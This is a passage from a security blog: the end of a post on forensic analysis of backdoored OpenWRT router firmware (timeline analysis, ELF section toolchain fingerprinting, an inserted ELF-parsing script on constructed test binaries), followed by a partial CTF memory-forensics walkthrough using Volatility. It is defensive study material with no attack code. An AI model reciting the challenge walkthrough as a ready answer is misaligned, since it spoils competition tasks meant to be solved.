<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggnsmUGR6ztdDyqRm5cy7rB0WeEBEUwAlHIIvsx7i-ZHXi_s_DoiFFjzO7dQM9qjlEI9CmeDcG6lrlFEISv3uOouzCxbGuMug7xOm2c52-p6OhLUUaDjY0TTSpjd2PXW1p7JfYTeJpp1ta/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggnsmUGR6ztdDyqRm5cy7rB0WeEBEUwAlHIIvsx7i-ZHXi_s_DoiFFjzO7dQM9qjlEI9CmeDcG6lrlFEISv3uOouzCxbGuMug7xOm2c52-p6OhLUUaDjY0TTSpjd2PXW1p7JfYTeJpp1ta/s1600/flag.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This was just too easy right? But what if we didn't have a known template for comparison?<br />
<br />
<b><br /></b>
<b>Timeline Analysis</b><br />
<b><br /></b>
My tool of choice to perform timeline analysis is <a href="http://plaso.kiddaland.net/">Plaso</a>, created by <a href="https://twitter.com/el_killerdwarf">@el_killerdwarf</a>. The tool is Python-based, modular and very fast. What I like most about it is how easy it is to output results to <a href="http://www.elasticsearch.org/overview/elkdownloads/">ELK</a>. If you don't know about Plaso and the ELK stack, read this <a href="http://blog.kiddaland.net/2013/11/visualize-output.html">quick tutorial</a> and <a href="http://plaso.kiddaland.net/developer/building-the-tool/linux">set up your environment</a>.<br />
<br />
Let's use <a href="http://plaso.kiddaland.net/usage/log2timeline">log2timeline</a> to create a dump file, pointing to the extracted SquashFS path:<br />
<br />
<div class="code">
log2timeline.py output.dump squashfs-root/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRdNImiy8qb-2S1BlI7pLoJQd3wgD_Ao8kX5wfT6Q4IkGRB0Xayd5kH4R3X7VKPc2I3tHY-TnFQAl8ANrLCrmvtRlcpvOwQw1ZRCiWyfvKzupBH1UAupeX6AO9mNlApKqsYHUT1fBbpH8e/s1600/Screenshot-Terminal-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRdNImiy8qb-2S1BlI7pLoJQd3wgD_Ao8kX5wfT6Q4IkGRB0Xayd5kH4R3X7VKPc2I3tHY-TnFQAl8ANrLCrmvtRlcpvOwQw1ZRCiWyfvKzupBH1UAupeX6AO9mNlApKqsYHUT1fBbpH8e/s1600/Screenshot-Terminal-8.png" width="400" /></a></div>
<br />
Let's fire up psort and load the data into the timeline:<br />
<br />
<div class="code">
psort.py -o elastic output.dump</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPg4vQAiXUftP_X6isltYct6JPwn97rWofnvi1c0qK7IDyRQrZpb3JuHFYdpTupIo82LUjxF_dSXuMBIRQur7QHRRW7OuXbTkwMd6ZFl3Uoirwak4nal_q1K5EcTM5mhkv9mntQC5CnZ7/s1600/Screenshot-Terminal-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPg4vQAiXUftP_X6isltYct6JPwn97rWofnvi1c0qK7IDyRQrZpb3JuHFYdpTupIo82LUjxF_dSXuMBIRQur7QHRRW7OuXbTkwMd6ZFl3Uoirwak4nal_q1K5EcTM5mhkv9mntQC5CnZ7/s1600/Screenshot-Terminal-9.png" width="400" /></a></div>
<br />
That's all: Plaso uses the <a href="https://github.com/log2timeline/plaso/blob/master/plaso/parsers/filestat.py">filestat</a> parser to extract metadata from the files, outputting the results to Elasticsearch.<br />
<br />
We already identified the following dates from the firmware:<br />
<br />
<ul>
<li>03 February 2007 (??:??:??): BinHeader firmware creation date</li>
<li>03 February 2007 (13:16:08): Linux Kernel compile date</li>
<li>29 October 2014 (16:53:25): SquashFS creation or last append time</li>
</ul>
<br />
First let's filter the filesystem attributes: we only want to display the mtime (modification) timestamps, so we run a micro analysis on that field and include just this value. The filter should be something like this: field must | field timestamp_desc | query: "mtime".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgnIx-kSSS3CpP4bvL1InNyXhyphenhypheniJWJhr1IptsDIaCeZKT5IjDrjlvTn2qBl8K1fY_0cbnnIcHmmilBNGdQfDnJ1j88KE7dZ7uzdkej11gDm8_PTDmpnQZIEV2eDtupQ4W4x4diZhJr_2m3/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgnIx-kSSS3CpP4bvL1InNyXhyphenhypheniJWJhr1IptsDIaCeZKT5IjDrjlvTn2qBl8K1fY_0cbnnIcHmmilBNGdQfDnJ1j88KE7dZ7uzdkej11gDm8_PTDmpnQZIEV2eDtupQ4W4x4diZhJr_2m3/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox.png" width="640" /></a></div>
<br />
The histogram view is very helpful to get a big picture of what's going on:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYndnlrFW3kKS_PuQou0DzvThOHZw4-jcfROKIpdIDzkw288b1eIWGP3T2AdUepG3718YEOrtDVqJjLBGBBgPhgsN6nl61Sb3LdV2iRNdK4-8ZKCVDJDzuZtSdgHuH9diwV6EgNwD8HkI/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYndnlrFW3kKS_PuQou0DzvThOHZw4-jcfROKIpdIDzkw288b1eIWGP3T2AdUepG3718YEOrtDVqJjLBGBBgPhgsN6nl61Sb3LdV2iRNdK4-8ZKCVDJDzuZtSdgHuH9diwV6EgNwD8HkI/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-2.png" width="640" /></a></div>
<br />
We can clearly see that the files included/modified on 2014-10-29 are the malicious ones. The <strike>state sponsored</strike> attacker did not modify any other files from the OpenWRT base image.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLGB4tuUwhLuJaqSjyBmR5iE7rOgWtnlG8rlO5f4SMDofazD_xotrpCTYqvlrBn131CfW-fgVOaUFFGruXIBgRbYXXCBN10DNMFSOrTiDW3EIALnxEoSx8RiTMumh2qAAMrJXJfxk8ppB/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLGB4tuUwhLuJaqSjyBmR5iE7rOgWtnlG8rlO5f4SMDofazD_xotrpCTYqvlrBn131CfW-fgVOaUFFGruXIBgRbYXXCBN10DNMFSOrTiDW3EIALnxEoSx8RiTMumh2qAAMrJXJfxk8ppB/s1600/Screenshot-Kibana+3+-+Plaso+-+Mozilla+Firefox-1.png" width="640" /></a></div>
<br />
At this point it is pretty clear that the firmware was modified using the <a href="https://downloads.openwrt.org/whiterussian/0.9/">OpenWRT Image Builder</a>, which is a pre-compiled OpenWrt build environment. The BinHeader and the Kernel timestamps were left untouched and the only partition modified was the SquashFS one.<br />
<br />
Of course these timestamps, like any kind of metadata, could be tampered with by the attacker. They are nevertheless very helpful during the initial phases, speeding up the investigation and narrowing the analysis down to a smaller set of data.<br />
<br />
<b><br /></b>
<b>ELF Structural Information</b><br />
<br />
I'm always impressed when AV vendors <a href="http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/">manage to profile APT and state-sponsored attackers</a> based on PE timestamps. Techniques like the <a href="https://www.mandiant.com/blog/tracking-malware-import-hashing/">imphash</a> are generally used exclusively on Windows.<br />
<br />
PE Imports are the functions that a piece of software calls from other files (typically DLLs). To track these imports, a hash is created based on library/API names and their specific order within the executable. Because of the way a PE’s import table is generated, we can use the imphash value to identify related malware samples, for example.<br />
<br />
Everybody does that for Windows binaries, but what about Linux? VirusTotal recently <a href="http://blog.virustotal.com/2014/11/virustotal-detailed-elf-information.html">included detailed ELF information in their engine</a>. ELF sections can be used the same way to extract useful information from binaries, including the toolchain used to compile them.<br />
<br />
ELF files generally carry no timestamp at all, but there are many other interesting fields. This <a href="http://reverse.lostrealm.com/protect/strip.html">quick guide on using strip</a> summarizes some of them:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><i>When an executable is produced from source code, there are two stages - compilation and linking. Compiling takes a source file and produces an object file. Linking concatenates these object files into a single executable. The concatenation occurs by section. For example, the .comment section for the final executable will contain the contents of the .comment section of each object file that was linked into the executable.</i></span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><i>If we examine the contents of the .comment section we can see the compiler used, plus the version of the compiler</i></span></blockquote>
It's pretty simple to read and parse the .comment sections of ELF files. <a href="https://www.gnu.org/software/binutils/">GNU readelf</a> (part of binutils) and <a href="https://github.com/eliben/pyelftools">pyelftools</a> include all the functions needed to parse them. <br />
<br />
I always try to display information from object files using different toolchains in order to find out which one understands the file structure properly. In this specific case, I'm going to use mipsel-linux-gnu-readelf (part of the <a href="http://www.emdebian.org/">Emdebian</a> toolchain), but the regular readelf also does the job.<br />
<br />
<div class="code">
find . -type f | while read -r i ; do echo "$i" ; mipsel-linux-gnu-readelf -p .comment "$i" ; done > comment-section.txt</div>
<div class="code">
./lib/modules/2.4.30/diag.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-adm.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-robo.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/switch-core.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)<br />
<br />
./lib/modules/2.4.30/wlcompat.o<br />
<br />
String dump of section '.comment':<br />
[ 1] GCC: (GNU) 3.4.4 (OpenWrt-1.0)</div>
<br />
Only a few ELF files kept the .comment section; the others were stripped during the compilation/linking phase. If we download the OpenWRT 0.9 <a href="https://downloads.openwrt.org/whiterussian/0.9/whiterussian-0.9.tar.bz2">sources</a> we can see that GCC 3.4.4 was indeed used:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguRNbkS5O0SkNKVmCnXtPObefTbL1QtA3WlFJQtC845WDh8GrViE4gBnC23hR1OxvT2kaFIcyr7cRzVYNV2URz_6FpMlKKHta9NXmMwBTQCSFZdAZmX2ZX1hAkzne5Tx5zSK1slPzb5uoi/s1600/gcc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguRNbkS5O0SkNKVmCnXtPObefTbL1QtA3WlFJQtC845WDh8GrViE4gBnC23hR1OxvT2kaFIcyr7cRzVYNV2URz_6FpMlKKHta9NXmMwBTQCSFZdAZmX2ZX1hAkzne5Tx5zSK1slPzb5uoi/s1600/gcc.png" width="400" /></a></div>
<br />
<a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">TheMoon Worm</a> exploited a command injection to infect Linksys wireless routers with self-replicating malware. If we analyze its .comment section, we can see that it was probably compiled and linked using GCC 4.2.4 and 3.3.2. If we search for a .comment section in the firmware of the E4200, a router targeted by the worm, we can't find any, because the toolchain stripped all of them. A file compiled with a different toolchain, or containing extra ELF sections that the other files don't have, is highly suspicious.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeNDcpsDMMVWGbUN6Fezqrh15Oc8bKkOoNvnOtASfU3syJSV8RMBsaaXYBc3xgSaSZo-YGGrvwiuovtjLq6YtfdjunkdG1f6aJHGIs_Cc7b9SIoY3zBuKrSIldCLmvJqfvdVocThSGs0TD/s1600/moon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeNDcpsDMMVWGbUN6Fezqrh15Oc8bKkOoNvnOtASfU3syJSV8RMBsaaXYBc3xgSaSZo-YGGrvwiuovtjLq6YtfdjunkdG1f6aJHGIs_Cc7b9SIoY3zBuKrSIldCLmvJqfvdVocThSGs0TD/s1600/moon.png" width="400" /></a></div>
<br />
The .comment section of the final executable includes the contents of the .comment section of each object file that was linked into it. If we compare the comment sections of <a href="http://www.asus.com/us/Networking/RTAC87U/HelpDesk_Download/">ASUS RT-AC87U</a> firmware versions v3.0.0.4.378.3885 and v3.0.0.4.376.2769, we can spot an extra line in tfat.ko on the newer version:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWexdvaJTK-nI845eF3B_ZZ3BqrUOTpo-rOpFSr4VLZZhjO011d9DX_bWwv9SKFXr8wnKsOrcJaEXSRF6ESHLJHXQ5TzxJGsCzHlQPrB1Cy_415Tn99werLHY0wYBEtZtI1uP15bG33FMS/s1600/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWexdvaJTK-nI845eF3B_ZZ3BqrUOTpo-rOpFSr4VLZZhjO011d9DX_bWwv9SKFXr8wnKsOrcJaEXSRF6ESHLJHXQ5TzxJGsCzHlQPrB1Cy_415Tn99werLHY0wYBEtZtI1uP15bG33FMS/s1600/compare.png" width="640" /></a></div>
<br />
If you want to dump all sections from the ELF file you may use this command line (kind of hacky, but works):<br />
<br />
<div class="code">
for i in $(find .) ; do echo "$i" ; for j in $(readelf -S "$i" | grep \\[ | cut -d"]" -f2 | cut -d " " -f2 | grep -v "Name") ; do mipsel-linux-gnu-readelf -p "$j" "$i" ; done ; done > list.txt</div>
<br />
The output will be a bit too verbose, you may want to narrow the analysis to the following sections:<br />
<br />
<ul>
<li>.comment - the compiler version strings ("GCC: (GNU) ...") of every object file linked in</li>
<li>.modinfo - kernel module metadata (vermagic, license, depends, author)</li>
<li>.note.* (e.g. .note.ABI-tag, .note.gnu.build-id) - notes put there by the compiler/linker toolchain</li>
<li>.debug_* - DWARF information for symbolic debugging, if the file was not stripped</li>
<li>.interp - the path of the dynamic loader (program interpreter)</li>
</ul>
<br />
For more information regarding the ELF file structure, check the <a href="http://man7.org/linux/man-pages/man5/elf.5.html">ELF man</a> and the Chapter 5 from <a href="http://www.amazon.com/Malware-Forensics-Field-Guide-Systems/dp/1597494704/">Malware Forensics Field Guide for Linux Systems</a>.<br />
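As an added example (it is not code from the original post), the following Python script does what the readelf loops above do without binutils or pyelftools: it parses the ELF header and section table by hand for 32- and 64-bit images in either byte order (big-endian MIPS is common in router firmware), extracts the .comment, .interp and .modinfo strings, and flags the files in a tree whose compiler banners differ from the majority. The ELF images it runs on are built in memory by <code>build_elf</code> as constructed test data, and the paths in the demo are hypothetical. Note the empty result when the section table is missing: sstrip-style tools remove it entirely, which is itself a data point when the rest of the firmware keeps it.

```python
import struct
from collections import Counter

# e_machine values common in router firmware; anything else is reported as EM_<n>
ELF_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def parse_elf(data):
    """Parse the ELF header and section table of an in-memory image.

    Handles ELFCLASS32/64 and both byte orders (big-endian MIPS is common in
    router firmware). Returns word size, endianness, machine and {name: bytes}.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    cls, enc = data[4], data[5]
    if cls not in (1, 2) or enc not in (1, 2):
        raise ValueError("unknown ELF class or data encoding")
    e = "<" if enc == 1 else ">"
    hdr_fmt = e + ("HHIIIIIHHHHHH" if cls == 1 else "HHIQQQIHHHHHH")
    sh_fmt = e + ("IIIIIIIIII" if cls == 1 else "IIQQQQIIQQ")
    hdr = struct.unpack_from(hdr_fmt, data, 16)
    machine, shoff, shentsize, shnum, shstrndx = hdr[1], hdr[5], hdr[10], hdr[11], hdr[12]
    sections = {}
    # sstrip'ed firmware binaries drop the section table entirely: nothing to read then,
    # which is itself worth noting when the other files in the tree still have one.
    if shoff and shnum:
        shdrs = [struct.unpack_from(sh_fmt, data, shoff + i * shentsize) for i in range(shnum)]
        str_off, str_size = shdrs[shstrndx][4], shdrs[shstrndx][5]
        strtab = data[str_off:str_off + str_size]
        for name_idx, sh_type, _flags, _addr, off, size, *_ in shdrs[1:]:
            name = strtab[name_idx:strtab.index(b"\0", name_idx)].decode("ascii", "replace")
            sections[name] = b"" if sh_type == 8 else data[off:off + size]  # SHT_NOBITS has no file bytes
    return {"bits": 32 if cls == 1 else 64, "endian": "LE" if enc == 1 else "BE",
            "machine": ELF_MACHINES.get(machine, f"EM_{machine}"), "sections": sections}


def section_strings(blob):
    """NUL-separated strings of a section, as readelf -p lists them (the leading NUL in .comment is normal)."""
    return [s.decode("ascii", "replace") for s in blob.split(b"\0") if s]


def toolchain_profile(data):
    """The fields discussed above: architecture, compiler banners, dynamic loader, module metadata."""
    info = parse_elf(data)
    secs = info["sections"]
    modinfo = section_strings(secs.get(".modinfo", b""))
    return {
        "arch": f"{info['machine']}/{info['bits']}-bit/{info['endian']}",
        "comment": section_strings(secs.get(".comment", b"")),
        "interp": section_strings(secs.get(".interp", b"")),
        "modinfo": dict(kv.split("=", 1) for kv in modinfo if "=" in kv),
    }


def toolchain_outliers(images):
    """Paths whose set of .comment banners differs from the majority of the tree."""
    sig = {path: tuple(sorted(toolchain_profile(d)["comment"])) for path, d in images.items()}
    majority = Counter(sig.values()).most_common(1)[0][0]
    return sorted(path for path, s in sig.items() if s != majority)


def build_elf(sections, cls=1, little=True, machine=8):
    """Assemble a minimal relocatable ELF around the given sections (constructed test data, not a real binary)."""
    e = "<" if little else ">"
    names = list(sections) + [".shstrtab"]
    shstrtab, name_off = b"\0", {}
    for n in names:
        name_off[n] = len(shstrtab)
        shstrtab += n.encode() + b"\0"
    ehsize, shentsize = (52, 40) if cls == 1 else (64, 64)
    sh_fmt = e + ("IIIIIIIIII" if cls == 1 else "IIQQQQIIQQ")
    body, shdrs, off = b"", [bytes(shentsize)], ehsize  # entry 0 is the mandatory null header
    for n, blob in zip(names, list(sections.values()) + [shstrtab]):
        sh_type = 3 if n == ".shstrtab" else 1  # SHT_STRTAB / SHT_PROGBITS
        shdrs.append(struct.pack(sh_fmt, name_off[n], sh_type, 0, 0, off, len(blob), 0, 0, 1, 0))
        body += blob
        off += len(blob)
    ident = b"\x7fELF" + bytes([cls, 1 if little else 2, 1]) + bytes(9)
    hdr_fmt = e + ("HHIIIIIHHHHHH" if cls == 1 else "HHIQQQIHHHHHH")
    hdr = struct.pack(hdr_fmt, 1, machine, 1, 0, 0, off, 0, ehsize, 0, 0, shentsize, len(shdrs), len(shdrs) - 1)
    return ident + hdr + body + b"".join(shdrs)


if __name__ == "__main__":
    # Constructed tree: two objects carrying the OpenWrt banner and one built elsewhere (paths hypothetical).
    openwrt = build_elf({".comment": b"\0GCC: (GNU) 3.4.4 (OpenWrt-1.0)\0"})
    foreign = build_elf({".comment": b"\0GCC: (GNU) 4.2.4\0GCC: (GNU) 3.3.2\0"}, little=False)
    tree = {"lib/modules/2.4.30/diag.o": openwrt, "lib/modules/2.4.30/switch-core.o": openwrt,
            "usr/bin/suspect": foreign}
    for path, image in tree.items():
        print(path, toolchain_profile(image))
    print("outliers:", toolchain_outliers(tree))
```

On a real extracted root filesystem, feed <code>open(path, "rb").read()</code> for every file to <code>toolchain_profile</code> and build the <code>images</code> dict from the results; files without a section table show up with an empty banner set, so they either form the majority (a fully stripped firmware) or stand out next to files that were not stripped.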
<br />
<br />
<b>Conclusion</b><br />
<br />
Without further clues or context this information may not be relevant, but in conjunction with other data it helps to get a big picture of what's going on:<br />
<br />
<ul>
<li>Diffing the content of previous firmware versions may be useful to find out when backdoors were first installed, modified and/or removed.</li>
<li>Artifact timeline creation and analysis also helps to speed up investigations by correlating the vast amount of information found on the system.</li>
<li>The contents of the ELF sections will likely reveal the toolchain and the compiler version used to build a suspect executable. Clues such as these are attribution identifiers, contributing towards identifying the platform the attacker used to craft his code.</li>
</ul>
<br />
We can use the timestamps from the kernel partition to correlate different firmware images from the same family, for example. We can also compare the timestamps of each partition to find deviations: a firmware header created in 2007, with a kernel timestamp from 2007 and a SquashFS partition dated 2014, is highly suspicious.<br />
<br />
The <a href="http://firmware.re/">Firmware.RE</a> project is performing a large-scale analysis, providing a better understanding of the security issues related to firmware. A broader view of firmware is not only beneficial but necessary to discover new vulnerabilities and backdoors, correlate different device families and show how vulnerabilities reappear across different products. This is a really cool project to track how firmware images are evolving and getting security fixes.<br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twitter.com/vendorexcuses/status/550350987102552064"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYtcb2L9Vch9QwBhQhv_g9vlbaQFDAlwnmtZO7v5Jm4s8Hl8F12MJG3wy48JjZ7oK8STOlh1QQgcxe6Jrn9Tjwryj_fmUmigtc2BdTwDCDAVdKnPrWs7VHY_wicaXYR4oc8ydlbBpP6GtQ/s1600/tweet2.png" width="400" /></a></div>
<br />Posted by Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br />
<br />
<b>9447 2014 CTF Write Up: coor coor</b> (2014-11-30, updated 2014-12-04)<div>
The Australian <a href="https://9447.plumbing/home">9447 Security Society CTF</a> took place on November 29-30 and it was yet another fun and really professionally organized CTF. I played with my friends from <a href="https://ctftime.org/team/10288">TheGoonies</a> once again (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>, right?).</div>
<br />
I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new book I recently bought: <a href="http://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098/">The Art of Memory Forensics</a> (authored by <a href="https://twitter.com/attrc">@attrc</a> and <a href="https://twitter.com/gleeda">@gleeda</a>).<br />
<br />
<b>Task: coor coor (misc - 400)</b><br />
<br />
<div class="code">
A 9447 CTF organizer is giving away flags to friends that he trusts. This memory dump was taken off a competitor's computer after a raid by the pwnpolice.
</div>
<br />
Download provided: <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2</a><br />
<br />
Let's start by identifying the Operating System profile:<br />
<div class="code">
python vol.py -f challenge.vmem imageinfo</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWbcfXviIh9S0etUEQJ37tfYxju_iIUvWJbnm1DypGH2jbudTyVknlqmLlliCQtP2R42xI6R7yH33c7wzv3lvgV8oIcZMDfg2jQRV1DavJkCD5KK9pP0sCDCvCbGw0eZjecixGSt5q_EZ/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWbcfXviIh9S0etUEQJ37tfYxju_iIUvWJbnm1DypGH2jbudTyVknlqmLlliCQtP2R42xI6R7yH33c7wzv3lvgV8oIcZMDfg2jQRV1DavJkCD5KK9pP0sCDCvCbGw0eZjecixGSt5q_EZ/s1600/Screenshot-Terminal.png" height="222" width="400" /></a></div>
<br />
Let's take a screenshot to see what the user was doing:<br />
<div class="code">
python vol.py -f challenge.vmem screenshot -D screenshot/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPqJOWnY9tU1eMTWZU1_ns6P1L4knBCj0JAyoF5C_WvxZGHiuY_za_gGo7UtiAs8cshDub88eS9TWEIwavvLsXhfzRWxwdID66y9-TEnp618gdKq-UCWYJ_iqJ_C_wUbi_xeBNZsAC_79/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPqJOWnY9tU1eMTWZU1_ns6P1L4knBCj0JAyoF5C_WvxZGHiuY_za_gGo7UtiAs8cshDub88eS9TWEIwavvLsXhfzRWxwdID66y9-TEnp618gdKq-UCWYJ_iqJ_C_wUbi_xeBNZsAC_79/s1600/session_0.WinSta0.Default.png" height="182" width="320" /></a></div>
<br />
The user was running something inside VirtualBox, let's keep digging:<br />
<div class="code">
python vol.py -f challenge.vmem psxview</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeog3KLgUfspetmkTyP2Qar7gSoJ8toFh8Bk85k4Pa8uCo9mutipNdGNnsdsLQqycoRS8lF_Wms_JzxtGP6PqEn8dvzkmaC1yL-2moA-aFHVhzxCv8scpm688PIbxAGudlHICtAFQUSctm/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeog3KLgUfspetmkTyP2Qar7gSoJ8toFh8Bk85k4Pa8uCo9mutipNdGNnsdsLQqycoRS8lF_Wms_JzxtGP6PqEn8dvzkmaC1yL-2moA-aFHVhzxCv8scpm688PIbxAGudlHICtAFQUSctm/s1600/Screenshot-Terminal-1.png" height="320" width="280" /></a></div>
<div class="code">
python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFekiF7LITz92Jth_9kQ15MSz_Tk4nH5zwmBG7N4lSsrr7B3DHGwx7N10fqFqvgFlg8Y5IxOAp_c3j8LSHhi3lzYsfXMYGIcCq3fUbARKk0fm5ZKFpfy4VaG3CpW_oFy-TlkVb3MJMBpV1/s1600/xaaa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFekiF7LITz92Jth_9kQ15MSz_Tk4nH5zwmBG7N4lSsrr7B3DHGwx7N10fqFqvgFlg8Y5IxOAp_c3j8LSHhi3lzYsfXMYGIcCq3fUbARKk0fm5ZKFpfy4VaG3CpW_oFy-TlkVb3MJMBpV1/s1600/xaaa.png" height="241" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The user was running a VirtualBox machine (business2.vdi) from an encrypted TrueCrypt container (secret.tc). That's why we used psxview to list the system processes earlier. Note that the lower offsets belong to the host and the higher ones (after 0x7b760da0) to the guest OS. So what was he doing?<br />
<br />
<div class="code">
python vol.py -f challenge.vmem connscan</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_OGgOAkFiwLbDsROCjRK53Ww3N7_lZEzB05Ppy57YgD4OV5-l49brca289awJqFuOVeNOLXiFddg6OgiKRoP3O4aazLofAzUl4ejCQub-RgC7iceK0vNL_yXLL-rWfD5fIhGRQ23rUXpd/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_OGgOAkFiwLbDsROCjRK53Ww3N7_lZEzB05Ppy57YgD4OV5-l49brca289awJqFuOVeNOLXiFddg6OgiKRoP3O4aazLofAzUl4ejCQub-RgC7iceK0vNL_yXLL-rWfD5fIhGRQ23rUXpd/s1600/Screenshot-Terminal-4.png" height="81" width="400" /></a></div>
<br />
The host 54.149.24.114 (yodawg.9447.plumbing) happened to be an IRC server with only one active channel: #9447ctf. Searching the MFT for the channel name turns up Pidgin log files, which we can then carve out of the dump with foremost:<br />
<br />
<div class="code">
python vol.py -f challenge.vmem mftparser | grep 9447ctf</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5mPQAFH1Fnog263RDbIaGIIYitTkXbadZH1lO3cA9th37SHQ795IjvKOjRjg1Ivd6994UAodg_ukt7gym6WNBvVvzhD9xX0ApWp8s_h-0bi2gVqketFhk3TCMLHnLumPsDlrjyPp29wf/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS5mPQAFH1Fnog263RDbIaGIIYitTkXbadZH1lO3cA9th37SHQ795IjvKOjRjg1Ivd6994UAodg_ukt7gym6WNBvVvzhD9xX0ApWp8s_h-0bi2gVqketFhk3TCMLHnLumPsDlrjyPp29wf/s1600/Screenshot-Terminal-5.png" height="165" width="400" /></a></div>
<div class="code">
foremost challenge.vmem</div>
